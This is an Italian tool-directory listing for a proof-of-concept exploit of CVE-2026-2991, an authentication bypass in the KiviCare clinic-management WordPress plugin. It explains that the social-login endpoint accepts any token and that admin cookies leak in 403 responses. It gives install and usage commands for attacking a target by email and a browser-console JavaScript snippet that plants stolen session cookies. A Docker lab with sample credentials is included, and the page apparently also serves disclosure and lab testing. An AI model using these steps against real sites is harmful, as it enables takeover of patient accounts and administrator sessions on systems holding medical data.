Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-2991 — PoC exploit per CVE-2026-2991 — bypass dell'autenticazione nel plugin WordPress KiviCare (≤4.1.2) che consente la presa di controllo non autenticata degli account paziente e l'estrazione delle sessioni amministrative. | Kitploit
Strumenti/GitHubGitHub/joshuavanderpoll/cve-2026-2991
Autenticazione e AutorizzazioneAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubjoshuavanderpoll/cve-2026-2991

CVE-2026-2991

PoC exploit per CVE-2026-2991 — bypass dell'autenticazione nel plugin WordPress KiviCare (≤4.1.2) che consente la presa di controllo non autenticata degli account paziente e l'estrazione delle sessioni amministrative.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi RepositorySito web
265 mesi faNon ancora revisionato

KiviCare <= 4.1.2 - Bypass dell'autenticazione (CVE-2026-2991) PoC

Python

📜 Descrizione

CVE-2026-2991 è una vulnerabilità di bypass dell'autenticazione nel plugin WordPress KiviCare – Clinic & Patient Management System (EHR) che colpisce tutte le versioni fino alla 4.1.2 inclusa.

Il plugin espone un endpoint REST pubblico all'indirizzo /wp-json/kivicare/v1/auth/patient/social-login che autentica gli utenti tramite social login. La funzione patientSocialLogin() accetta un indirizzo email e un token di accesso ma non valida mai il token rispetto al provider sociale dichiarato. Qualsiasi attaccante non autenticato può accedere come qualsiasi paziente registrato fornendo solo l'email del paziente e una stringa arbitraria come token.

Inoltre, i cookie di autenticazione di WordPress vengono rilasciati prima che venga applicato il controllo del ruolo di paziente. Ciò significa che per gli account non paziente (inclusi gli amministratori), la risposta restituisce un HTTP 403 ma include comunque header Set-Cookie validi — facendo trapelare una sessione admin riutilizzabile all'attaccante.

Versioni interessate: kivicare-clinic-management-system <= 4.1.2

✨ Funzionalità

  • Non autenticato — Non richiede credenziali né una sessione precedente
  • Compromissione dell'account paziente — Accedi come qualsiasi paziente registrato usando solo la sua email
  • Perdita della sessione admin — Estrae cookie di autenticazione admin validi dalla risposta 403 per gli account non paziente
  • Snippet per la console del browser — Genera JavaScript pronto da incollare per iniettare i cookie e reindirizzare direttamente alla dashboard

OSX/Linux

root@kitploit:~
git clone https://github.com/joshuavanderpoll/CVE-2026-2991.git
cd CVE-2026-2991
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt

Windows

root@kitploit:~
git clone https://github.com/joshuavanderpoll/CVE-2026-2991.git
cd CVE-2026-2991
python3 -m venv .venv
.venv\Scripts\activate
pip3 install -r requirements.txt

⚙️ Utilizzo

root@kitploit:~
python3 CVE-2026-2991.py --url <TARGET_URL> --email <TARGET_EMAIL> [--login-type <google|apple>] [--timeout <SECONDS>] [--useragent <UA>]

Compromissione dell'account paziente

Bypassa l'autenticazione per un paziente registrato. Lo script restituisce la sessione completa, inclusi nonce e cookie riutilizzabili.

root@kitploit:~
python3 CVE-2026-2991.py --url 'https://target.com' --email '[email protected]'

Bypass paziente


Perdita della sessione admin (account non paziente)

Fornisci l'email di qualsiasi utente non paziente (ad es. un amministratore). L'endpoint rilascia cookie di autenticazione validi prima del controllo del ruolo e restituisce 403 — questi cookie vengono estratti e stampati.

root@kitploit:~
python3 CVE-2026-2991.py  --url http://localhost:8080/ --email '[email protected]'

Perdita cookie admin


Accesso tramite console del browser

Dopo un'esecuzione riuscita, lo script stampa uno snippet JavaScript. Apri il sito target nel browser, incolla lo snippet nella console del browser (F12 → Console) e premi Invio: imposta i cookie rubati e ti porta automaticamente alla dashboard.

root@kitploit:~
(() => {
  document.cookie = "wordpress_<hash>=<value>; path=/";
  document.cookie = "wordpress_logged_in_<hash>=<value>; path=/";
  window.location.href = "http://target.com/kivicare-patient-dashboard";
})();

🐋 PoC Docker

Un ambiente Docker Compose autonomo con il plugin vulnerabile preinstallato e popolato con dati di test realistici. Consulta DOCKER.md per maggiori dettagli.

root@kitploit:~
cd docker/
docker compose up

Il laboratorio crea i seguenti account al primo avvio:

root@kitploit:~
# Bypass a patient
python3 CVE-2026-2991.py --url 'http://localhost:8080' --email '[email protected]'

# Leak admin session cookies
python3 CVE-2026-2991.py --url 'http://localhost:8080' --email '[email protected]'

🕵🏼 Riferimenti

  • KiviCare — WordPress Plugin
  • NVD — CVE-2026-2991
  • WordFence
  • HackIndex.io — CVE-2026-2991

📢 Disclaimer

Questo strumento è fornito esclusivamente a scopo educativo e di ricerca. Il creatore non si assume alcuna responsabilità per un uso improprio o per danni causati da questo strumento.

Scarica lo strumento
RuoloNome utenteEmailPassword
Adminadmin[email protected]admin
Medicodr.harris[email protected]Doctor@123
Medicodr.chen[email protected]Doctor@123
Medicodr.okonkwo[email protected]Doctor@123
Pazientejames.ford[email protected]Patient@123
Pazientesofia.reyes[email protected]Patient@123
Pazienteoliver.knight[email protected]Patient@123
Pazienteamara.diallo[email protected]Patient@123
Pazientedan.walsh[email protected]Patient@123